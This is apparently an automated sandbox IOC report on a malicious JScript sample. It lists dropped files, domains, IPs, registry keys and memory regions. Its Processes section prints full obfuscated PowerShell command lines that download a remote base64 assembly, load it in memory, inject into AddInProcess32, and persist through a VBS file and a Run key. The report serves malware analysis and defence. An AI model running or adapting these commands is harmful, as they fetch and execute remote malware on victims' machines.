IOC Report
scan_374783.js

loading gif

Files

File Path
Type
Category
Malicious
scan_374783.js
Unicode text, UTF-16, little-endian text, with CRLF line terminators
initial sample
malicious
C:\ProgramData\alcatifa.vbs
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0dogn2cd.zn2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ic5ghhj4.ehf.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pm4ykldh.vlu.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pwllnwfg.lai.psm1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_374783.js"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQgAnACsAJwAwADgAdQByAGwAIAA9ACAAQwAnACsAJwA3AEkAaAB0AHQAcABzADoALwAvAHIAYQAnACsAJwB3AC4AJwArACcAZwBpACcAKwAnAHQAaAB1ACcAKwAnAGIAdQAnACsAJwBzAGUAcgBjAG8AbgB0ACcAKwAnAGUAbgB0ACcAKwAnAC4AYwAnACsAJwBvAG0ALwBOACcAKwAnAG8ARABlAHQAZQBjAHQATwAnACsAJwBuAC8ATgBvAEQAZQAnACsAJwB0AGUAYwB0AE8AbgAvAHIAZQBmAHMAJwArACcALwBoACcAKwAnAGUAYQAnACsAJwBkACcAKwAnAHMAJwArACcALwAnACsAJwBtACcAKwAnAGEAaQBuAC8ARABlACcAKwAnAHQAYQBoAE4AbwAnACsAJwB0AGgALQBWACcAKwAnAC4AdAAnACsAJwB4AHQAQwAnACsAJwA3AEkAOwAgAEIAMAAnACsAJwA4AGIAYQBzACcAKwAnAGUANgA0AEMAJwArACcAbwAnACsAJwBuAHQAZQBuAHQAIAA9ACAAKABOAGUAdwAtAE8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwAnACsAJwBhAGQAJwArACcAUwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABCACcAKwAnADAAOAB1ACcAKwAnAHIAbAAnACsAJwApADsAIABCADAAJwArACcAOAAnACsAJwBiAGkAbgBhACcAKwAnAHIAJwArACcAeQAnACsAJwBDACcAKwAnAG8AbgB0ACcAKwAnAGUAbgB0ACAAPQAnACsAJwAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAJwArACcAcgB0AF0AOgA6ACcAKwAnAEYAcgAnACsAJwBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuACcAKwAnAGcAKAAnACsAJwBCADAAJwArACcAOABiAGEAJwArACcAcwBlADYANAAnACsAJwBDAG8AbgB0ACcAKwAnAGUAbgB0ACkAOwAgACcAKwAnAEIAMAA4AGEAcwBzAGUAbQBiAGwAeQAgACcAKwAnAD0AIABbAFIAZQBmAGwAJwArACcAZQBjACcAKwAnAHQAJwArACcAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATAAnACsAJwBvAGEAZAAoAEIAMAA4ACcAKwAnAGIAaQBuAGEAcgB5AEMAJwArACcAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQAKQAnACsAJwA7ACAAWwBkAG4AbABpAGIAJwArACcALgBJACcAKwAnAE8ALgBIACcAKwAnAG8AbQAnACsAJwBlACcAKwAnAF0AOgA6AFYAQQAnACsAJwBJACgAJwArACcAcABRACcAKwAnAFUAOAA4ADQAZQAnACsAJwA4AGUAMABkADUAMgAnACsAJwBmADAALQAnACsAJwBlADUAYQAnACsAJwBiAC0AJwArACcAMQAnACsAJwAxADYANAAtADAAMABjADYAJwArACcALQBhAGEAYQAyAGYAZgA1AGUAJwArACcAPQAnACsAJwBuACcAKwAnAGUAJwArACcAawAnACsAJwBvAHQAJgBhAGkAZABlAG0APQB0AGwAYQA/AHQAeAAnACsAJwB0ACcAKwAnAC4ANAAyADAAMgAwADEANwAwAG4AaQBnACcAKwAnAGkAcgBvAHIAZQAnACsAJwBpAHYAYQB4AC8AbwAvAG0AbwAnACsAJwBjAC4AJwArACcAdABvAHAAcwBwAHAAYQAuADQAMgAwADIAcwAnACsAJwB0AHAAeQByACcAKwAnAGMAJwArACcALwBiAC8AMAB2ACcAKwAnAC8AbQBvAGMAJwArACcALgAnACsAJwBzAGkAcABhAGUAbABnACcAKwAnAG8AbwBnACcAKwAnAC4AZQAnACsAJwBnAGEAcgBvACcAKwAnAHQAJwArACcAcwBlAHMAYQBiACcAKwAnAGUAcgBpAGYAJwArACcALwAvADoAJwArACcAcwAnACsAJwBwAHQAJwArACcAdABoAHAAUQBVACwAJwArACcAIABwAFEAVQAxAHAAUQBVACwAJwArACcAIABwAFEAVQBDADoAVAAnACsAJwA0AHkAUAByAG8AZwByAGEAbQBEAGEAdABhACcAKwAnAFQANAAnACsAJwB5ACcAKwAnAHAAUQBVACwAIABwACcAKwAnAFEAVQBhACcAKwAnAGwAYwBhAHQAaQAnACsAJwBmAGEAcAAnACsAJwBRAFUALAAgAHAAUQBVAEEAZABkAEkAbgBQAHIAJwArACcAbwBjAGUAcwBzADMAJwArACcAMgAnACsAJwBwAFEAVQAsACAAcABRACcAKwAnAFUAcABRAFUALABwACcAKwAnAFEAVQAnACsAJwBwACcAKwAnAFEAVQApACcAKQAgACAALQBDAHIAZQBwAEwAYQBDAGUAIAAoAFsAQwBoAGEAUgBdADEAMQAyACsAWwBDAGgAYQBSAF0AOAAxACsAWwBDAGgAYQBSAF0AOAA1ACkALABbAEMAaABhAFIAXQAzADQAIAAgAC0AQwByAGUAcABMAGEAQwBlACAAIAAoAFsAQwBoAGEAUgBdADYANwArAFsAQwBoAGEAUgBdADUANQArAFsAQwBoAGEAUgBdADcAMwApACwAWwBDAGgAYQBSAF0AMwA5ACAAIAAtAFIAZQBQAGwAQQBjAGUAIAAgACgAWwBDAGgAYQBSAF0ANgA2ACsAWwBDAGgAYQBSAF0ANAA4ACsAWwBDAGgAYQBSAF0ANQA2ACkALABbAEMAaABhAFIAXQAzADYAIAAgAC0AUgBlAFAAbABBAGMAZQAgACAAKABbAEMAaABhAFIAXQA4ADQAKwBbAEMAaABhAFIAXQA1ADIAKwBbAEMAaABhAFIAXQAxADIAMQApACwAWwBDAGgAYQBSAF0AOQAyACkAfAAuACgAIAAoAFsAcwBUAFIAaQBuAEcAXQAkAFYAZQBSAEIAbwBTAGUAcAByAGUARgBlAHIARQBOAGMAZQApAFsAMQAsADMAXQArACcAWAAnAC0ASgBPAGkAbgAnACcAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('B'+'08url = C'+'7Ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/N'+'oDetectO'+'n/NoDe'+'tectOn/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/De'+'tahNo'+'th-V'+'.t'+'xtC'+'7I; B0'+'8bas'+'e64C'+'o'+'ntent = (New-Obj'+'ec'+'t System.Net.We'+'bClient).D'+'ownlo'+'ad'+'Str'+'i'+'ng(B'+'08u'+'rl'+'); B0'+'8'+'bina'+'r'+'y'+'C'+'ont'+'ent ='+' [Syst'+'em.Conve'+'rt]::'+'Fr'+'omBase64Strin'+'g('+'B0'+'8ba'+'se64'+'Cont'+'ent); '+'B08assembly '+'= [Refl'+'ec'+'t'+'ion.Assembly]::L'+'oad(B08'+'binaryC'+'o'+'nten'+'t)'+'; [dnlib'+'.I'+'O.H'+'om'+'e'+']::VA'+'I('+'pQ'+'U884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpQU,'+' pQU1pQU,'+' pQUC:T'+'4yProgramData'+'T4'+'y'+'pQU, p'+'QUa'+'lcati'+'fap'+'QU, pQUAddInPr'+'ocess3'+'2'+'pQU, pQ'+'UpQU,p'+'QU'+'p'+'QU)') -CrepLaCe ([ChaR]112+[ChaR]81+[ChaR]85),[ChaR]34 -CrepLaCe ([ChaR]67+[ChaR]55+[ChaR]73),[ChaR]39 -RePlAce ([ChaR]66+[ChaR]48+[ChaR]56),[ChaR]36 -RePlAce ([ChaR]84+[ChaR]52+[ChaR]121),[ChaR]92)|.( ([sTRinG]$VeRBoSepreFerENce)[1,3]+'X'-JOin'')"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\alcatifa.vbs"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\alcatifa.vbs"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\alcatifa.vbs"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://paste.ee/
unknown
malicious
https://paste.ee/d/gvOd3
188.114.97.3
malicious
http://paste.ee/d/gvOd3
unknown
malicious
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
185.199.110.133
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
https://paste.ee:443/d/gvOd3
unknown
https://account.dyn.com/
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://paste.ee/d/gvOd3ee/dD
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/License
unknown
https://www.google.com;
unknown
https://contoso.com/Icon
unknown
https://raw.githubusercont
unknown
https://analytics.paste.ee
unknown
http://ip-api.comp
unknown
https://github.com/Pester/Pester
unknown
https://paste.ee/zD
unknown
https://www.google.com
unknown
https://raw.githubusercontent.com
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://ip-api.com
unknown
http://raw.githubusercontent.com
unknown
https://oneget.orgX
unknown
https://analytics.paste.ee;
unknown
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtC7I;
unknown
https://cdnjs.cloudflare.com
unknown
https://aka.ms/pscore68
unknown
https://cdnjs.cloudflare.com;
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.gravatar.com
unknown
https://themes.googleusercontent.com
unknown
https://oneget.org
unknown
http://ip-api.com/line/?fields=hosting
208.95.112.1
https://paste.ee/d/gvOd3t
unknown
There are 28 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
paste.ee
188.114.97.3
malicious
ip-api.com
208.95.112.1
malicious
raw.githubusercontent.com
185.199.110.133

IPs

IP
Domain
Country
Malicious
208.95.112.1
ip-api.com
United States
malicious
188.114.97.3
paste.ee
European Union
malicious
185.199.110.133
raw.githubusercontent.com
Netherlands

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Path
malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
JScriptSetScriptStateStarted
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
FileDirectory
There are 21 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
402000
remote allocation
page execute and read and write
malicious
27D1101C000
trusted library allocation
page read and write
malicious
6440000
trusted library allocation
page read and write
1D52EE43000
heap
page read and write
90B83FE000
stack
page read and write
7FFAAC603000
trusted library allocation
page read and write
1D52D4D0000
heap
page read and write
1D52F696000
heap
page read and write
4FB0000
trusted library allocation
page read and write
1D52EE89000
heap
page read and write
7FFB1DE00000
unkown
page readonly
1FFE3E70000
heap
page read and write
7FFAAC4F0000
trusted library allocation
page read and write
1D52EE5D000
heap
page read and write
27D01D25000
trusted library allocation
page read and write
1D52F63E000
heap
page read and write
20091BDD000
heap
page read and write
1D52F6A9000
heap
page read and write
27D00570000
trusted library allocation
page read and write
63E0000
heap
page read and write
1C6D6210000
heap
page read and write
90B84FE000
stack
page read and write
1D52F65E000
heap
page read and write
7FFAAC490000
trusted library allocation
page read and write
1C6D6370000
heap
page read and write
9A500FE000
unkown
page read and write
1C6D631F000
heap
page read and write
C2D29A3000
stack
page read and write
1D52F67C000
heap
page read and write
27D0175D000
trusted library allocation
page read and write
1D52EE83000
heap
page read and write
73D01000
unkown
page execute read
1C6D6377000
heap
page read and write
7FFAAC430000
trusted library allocation
page execute and read and write
7FFAAC27B000
trusted library allocation
page read and write
113E000
stack
page read and write
1D52F6AC000
heap
page read and write
1C6D66E5000
heap
page read and write
20091C90000
heap
page read and write
1D52EECF000
heap
page read and write
1D52F654000
heap
page read and write
20091B97000
heap
page read and write
27D01D21000
trusted library allocation
page read and write
27D01685000
trusted library allocation
page read and write
1D52D429000
heap
page read and write
1D52EE9F000
heap
page read and write
27D00001000
trusted library allocation
page read and write
7FFAAC452000
trusted library allocation
page read and write
1D52F352000
heap
page read and write
2BA8000
trusted library allocation
page read and write
1D52EE90000
heap
page read and write
1FFE5DAA000
trusted library allocation
page read and write
7FFAAC470000
trusted library allocation
page read and write
1FFE3EAF000
heap
page read and write
27D73960000
heap
page execute and read and write
1D52F5F6000
heap
page read and write
27D0170C000
trusted library allocation
page read and write
27D01C5C000
trusted library allocation
page read and write
1D52F63F000
heap
page read and write
7FFAAC4A0000
trusted library allocation
page read and write
1D52F67E000
heap
page read and write
1D52EEA9000
heap
page read and write
2008FF55000
heap
page read and write
1D52EEB4000
heap
page read and write
1D52F647000
heap
page read and write
1D52EE70000
heap
page read and write
1D52EE6E000
heap
page read and write
F6C000
heap
page read and write
27D003FB000
trusted library allocation
page read and write
612D000
stack
page read and write
1FFE3DF0000
heap
page read and write
20091BB8000
heap
page read and write
1D52EE66000
heap
page read and write
1D52F64C000
heap
page read and write
1D52F609000
heap
page read and write
1D52F685000
heap
page read and write
73D1D000
unkown
page read and write
1D52F6B0000
heap
page read and write
1D52F648000
heap
page read and write
1D52EEA4000
heap
page read and write
1D52F69E000
heap
page read and write
27D00F80000
trusted library allocation
page read and write
1D52F64E000
heap
page read and write
1D52EEB9000
heap
page read and write
2008FB9B000
heap
page read and write
626E000
stack
page read and write
1D52F633000
heap
page read and write
1D52EECF000
heap
page read and write
1D52F645000
heap
page read and write
7FFAAC530000
trusted library allocation
page read and write
2AAD000
trusted library allocation
page read and write
1FFFDE17000
heap
page execute and read and write
7FFAAC390000
trusted library allocation
page execute and read and write
1D52D45C000
heap
page read and write
27D754C2000
trusted library allocation
page read and write
292C000
stack
page read and write
7FFAAC510000
trusted library allocation
page read and write
1D52F655000
heap
page read and write
1D52EE7C000
heap
page read and write
26F65394000
heap
page read and write
B58000
stack
page read and write
C2D2F7F000
stack
page read and write
1C6D6315000
heap
page read and write
1D52F5F7000
heap
page read and write
7FFAAC5B0000
trusted library allocation
page read and write
1D52D670000
heap
page read and write
1D52D4BD000
heap
page read and write
C2D2CFE000
stack
page read and write
1FFE5DAD000
trusted library allocation
page read and write
1FFFDCFA000
heap
page read and write
1FFE5DF8000
trusted library allocation
page read and write
27D75680000
heap
page read and write
1D52F645000
heap
page read and write
7FFAAC60B000
trusted library allocation
page read and write
1D52EE7B000
heap
page read and write
1D52F6B6000
heap
page read and write
20091BB0000
heap
page read and write
1C6D43F8000
heap
page read and write
27D0172C000
trusted library allocation
page read and write
1C6D6350000
heap
page read and write
1D52F6BE000
heap
page read and write
26F653C0000
direct allocation
page read and write
540F000
stack
page read and write
20091B96000
heap
page read and write
1D52F678000
heap
page read and write
C2D307E000
stack
page read and write
7FFB1DE16000
unkown
page readonly
1D52F677000
heap
page read and write
1FFE57B4000
heap
page read and write
1D52D4C7000
heap
page read and write
1D52F7DE000
heap
page read and write
27D7372A000
heap
page read and write
AED13FE000
stack
page read and write
1D52F5F9000
heap
page read and write
1D52F656000
heap
page read and write
7FFAAC530000
trusted library allocation
page read and write
1FFFDCF0000
heap
page read and write
1FFFDD3A000
heap
page read and write
1D52D3D0000
heap
page read and write
1C6D6811000
heap
page read and write
20091B65000
heap
page read and write
2008FD50000
heap
page read and write
1D52F336000
heap
page read and write
39723FE000
stack
page read and write
1D52EE9A000
heap
page read and write
1FFE3E63000
heap
page read and write
1FFE60C3000
trusted library allocation
page read and write
664A8FE000
stack
page read and write
10F0000
trusted library allocation
page read and write
27D00404000
trusted library allocation
page read and write
7FFAAC590000
trusted library allocation
page read and write
20092096000
heap
page read and write
EC5000
heap
page read and write
26F653A0000
heap
page read and write
7FFB1DE22000
unkown
page readonly
1FFE5FB0000
trusted library allocation
page read and write
1D52F65A000
heap
page read and write
AED1637000
stack
page read and write
1D52F590000
remote allocation
page read and write
27D754C0000
trusted library allocation
page read and write
2BBE000
trusted library allocation
page read and write
39727FF000
stack
page read and write
554D000
stack
page read and write
50C0000
heap
page read and write
1D52F677000
heap
page read and write
7FFAAC440000
trusted library allocation
page execute and read and write
27D1029C000
trusted library allocation
page read and write
7FFB23B22000
unkown
page readonly
1C6D442D000
heap
page read and write
1C6D6211000
heap
page read and write
CA0000
heap
page read and write
7FFAAC480000
trusted library allocation
page read and write
1C6D637A000
heap
page read and write
10A3000
trusted library allocation
page execute and read and write
2B90000
trusted library allocation
page read and write
550E000
stack
page read and write
1D52F663000
heap
page read and write
5790000
heap
page read and write
20091C95000
heap
page read and write
1D52EEA9000
heap
page read and write
AED12FE000
stack
page read and write
20091B9C000
heap
page read and write
1FFE61CA000
trusted library allocation
page read and write
1D52F62C000
heap
page read and write
1FFE5710000
heap
page readonly
1D52EEB4000
heap
page read and write
1D52F626000
heap
page read and write
1D52EEB9000
heap
page read and write
39722FA000
stack
page read and write
1D52D4C6000
heap
page read and write
27D739A4000
heap
page read and write
1D52EE7E000
heap
page read and write
1FFE5D2A000
trusted library allocation
page read and write
1D52D41A000
heap
page read and write
1D52D4AE000
heap
page read and write
50B0000
heap
page read and write
1D52F437000
heap
page read and write
1C6D6411000
heap
page read and write
664A7FE000
stack
page read and write
7FFB1DE20000
unkown
page read and write
2008FB68000
heap
page read and write
7FFB23B25000
unkown
page readonly
1D52F673000
heap
page read and write
7FFAAC590000
trusted library allocation
page read and write
664AAFF000
stack
page read and write
7FFAAC420000
trusted library allocation
page execute and read and write
F03000
heap
page read and write
1D52F5E0000
heap
page read and write
1D52F43D000
heap
page read and write
1D52EFE0000
heap
page read and write
1D52F432000
heap
page read and write
1D52D4B1000
heap
page read and write
2008FD70000
heap
page read and write
2A8B000
trusted library allocation
page read and write
1D52EE46000
heap
page read and write
1D52D490000
heap
page read and write
7FFB1DE16000
unkown
page readonly
7FFAAC500000
trusted library allocation
page read and write
1D52F5F9000
heap
page read and write
1D52D4BD000
heap
page read and write
1D52D4DB000
heap
page read and write
AED0F73000
stack
page read and write
1D52F7F6000
heap
page read and write
1D52D477000
heap
page read and write
20091B7B000
heap
page read and write
3972BFE000
stack
page read and write
1D52EE4F000
heap
page read and write
1D52F639000
heap
page read and write
1D52F590000
remote allocation
page read and write
1D52F654000
heap
page read and write
1D52EE46000
heap
page read and write
1FFE5720000
trusted library allocation
page read and write
7FFAAC520000
trusted library allocation
page read and write
27D7373F000
heap
page read and write
20091B90000
heap
page read and write
1D52D458000
heap
page read and write
1D52F334000
heap
page read and write
1D52F352000
heap
page read and write
27D737D4000
heap
page read and write
1D52EF09000
heap
page read and write
1D52EE6B000
heap
page read and write
1D52EEA4000
heap
page read and write
20091BD1000
heap
page read and write
27D003EF000
trusted library allocation
page read and write
1D52D675000
heap
page read and write
E60000
heap
page read and write
1C6D6379000
heap
page read and write
1D52F7F7000
heap
page read and write
2960000
trusted library allocation
page read and write
1C6D637A000
heap
page read and write
1FFE5CC4000
trusted library allocation
page read and write
1D52F633000
heap
page read and write
AED127E000
stack
page read and write
1D52F43A000
heap
page read and write
27D75810000
heap
page read and write
C90000
heap
page read and write
27D1061C000
trusted library allocation
page read and write
1D52F330000
heap
page read and write
1FFE3F0D000
heap
page read and write
27D7596C000
heap
page read and write
2008FC70000
heap
page read and write
7FFAAC421000
trusted library allocation
page read and write
1D52D466000
heap
page read and write
1FFE5DA4000
trusted library allocation
page read and write
10AD000
trusted library allocation
page execute and read and write
9A501FF000
stack
page read and write
2AC0000
heap
page execute and read and write
1FFE618A000
trusted library allocation
page read and write
7DF47FD80000
trusted library allocation
page execute and read and write
1C6D633A000
heap
page read and write
1D52F355000
heap
page read and write
2A9E000
trusted library allocation
page read and write
27D0171F000
trusted library allocation
page read and write
1C6D6343000
heap
page read and write
1D52F639000
heap
page read and write
1D52EE83000
heap
page read and write
1C6D43F0000
heap
page read and write
1C6D4420000
heap
page read and write
1C6D637A000
heap
page read and write
73D00000
unkown
page readonly
7FFAAC460000
trusted library allocation
page execute and read and write
7FFAAC32C000
trusted library allocation
page execute and read and write
20091B94000
heap
page read and write
20091B97000
heap
page read and write
52F0000
heap
page read and write
1D52F7C1000
heap
page read and write
1D52F346000
heap
page read and write
1D52F634000
heap
page read and write
20091B7B000
heap
page read and write
1D52F437000
heap
page read and write
1D52EE96000
heap
page read and write
1D52D4C9000
heap
page read and write
7FFAAC270000
trusted library allocation
page read and write
1D52F69A000
heap
page read and write
1D52EECF000
heap
page read and write
1D52D4C8000
heap
page read and write
27D73768000
heap
page read and write
1D52D4C3000
heap
page read and write
27D0122A000
trusted library allocation
page read and write
1D52EEBC000
heap
page read and write
20093A40000
trusted library allocation
page read and write
1FFFDE10000
heap
page execute and read and write
1D52F646000
heap
page read and write
2A8E000
trusted library allocation
page read and write
1FFFDFC0000
heap
page read and write
1D52F682000
heap
page read and write
20091E91000
heap
page read and write
2BE7000
trusted library allocation
page read and write
1D52EE5D000
heap
page read and write
7FFAAC550000
trusted library allocation
page read and write
1C6D42F0000
heap
page read and write
27D10011000
trusted library allocation
page read and write
1D52F67E000
heap
page read and write
1C6D631A000
heap
page read and write
1D52F7FE000
heap
page read and write
58A7000
trusted library allocation
page read and write
90B86FF000
stack
page read and write
C2D2DFE000
stack
page read and write
1D52F65D000
heap
page read and write
20091C91000
heap
page read and write
10C2000
trusted library allocation
page read and write
1D52EE4C000
heap
page read and write
AED248D000
stack
page read and write
C2D327E000
stack
page read and write
622E000
stack
page read and write
7FFAAC480000
trusted library allocation
page read and write
26F65390000
heap
page read and write
2970000
heap
page read and write
1140000
heap
page read and write
1D52EE89000
heap
page read and write
27D738A0000
heap
page readonly
7FFAAC4E0000
trusted library allocation
page read and write
1D52F6BE000
heap
page read and write
1C6D634B000
heap
page read and write
39728FF000
stack
page read and write
20091BA7000
heap
page read and write
27D00080000
trusted library allocation
page read and write
1D52EECF000
heap
page read and write
27D01ACA000
trusted library allocation
page read and write
1D52F6B6000
heap
page read and write
BB0000
heap
page read and write
1FFFE240000
heap
page read and write
27D736E0000
heap
page read and write
2A7F000
stack
page read and write
7F8F0000
trusted library allocation
page execute and read and write
1D52F65E000
heap
page read and write
1D52EECF000
heap
page read and write
27D75742000
heap
page read and write
1D52F62D000
heap
page read and write
7FFAAC540000
trusted library allocation
page read and write
1D52EE63000
heap
page read and write
1FFE57B0000
heap
page read and write
2BCE000
trusted library allocation
page read and write
1D52F434000
heap
page read and write
7FFB1DE25000
unkown
page readonly
20091B70000
heap
page read and write
1D52F67E000
heap
page read and write
27D7595A000
heap
page read and write
1FFFDDE8000
heap
page read and write
58A0000
trusted library allocation
page read and write
1C6D6363000
heap
page read and write
1D52F7FA000
heap
page read and write
1D52F64F000
heap
page read and write
AED238E000
stack
page read and write
1C6D637A000
heap
page read and write
1C6D637A000
heap
page read and write
1D52EE4C000
heap
page read and write
90B88FF000
stack
page read and write
6380000
trusted library allocation
page read and write
20091BD8000
heap
page read and write
1D52F640000
heap
page read and write
1C6D6610000
heap
page read and write
C2D3178000
stack
page read and write
26F65290000
heap
page read and write
27D019D7000
trusted library allocation
page read and write
1D52F343000
heap
page read and write
1D52D4AE000
heap
page read and write
1D52F636000
heap
page read and write
564E000
stack
page read and write
1D52F644000
heap
page read and write
1D52F67D000
heap
page read and write
1D52EEC2000
heap
page read and write
AED173C000
stack
page read and write
1D52F637000
heap
page read and write
1FFE3E20000
heap
page read and write
27D73950000
heap
page read and write
58B0000
trusted library allocation
page read and write
1D52F64B000
heap
page read and write
1C6D6326000
heap
page read and write
27D75490000
trusted library allocation
page read and write
27D75670000
heap
page execute and read and write
7FFAAC460000
trusted library allocation
page read and write
1C6D6326000
heap
page read and write
2950000
trusted library allocation
page read and write
1D52F7C0000
heap
page read and write
C2D31F9000
stack
page read and write
1C6D6368000
heap
page read and write
20091BC0000
heap
page read and write
2008FB9C000
heap
page read and write
27D735F0000
heap
page read and write
27D75995000
heap
page read and write
2008FB81000
heap
page read and write
1D52F64F000
heap
page read and write
1D52F355000
heap
page read and write
1D52F67E000
heap
page read and write
1D52EEB4000
heap
page read and write
1D52D2F0000
heap
page read and write
1FFE3E68000
heap
page read and write
7FFB23B00000
unkown
page readonly
1D52EECF000
heap
page read and write
90B87FF000
stack
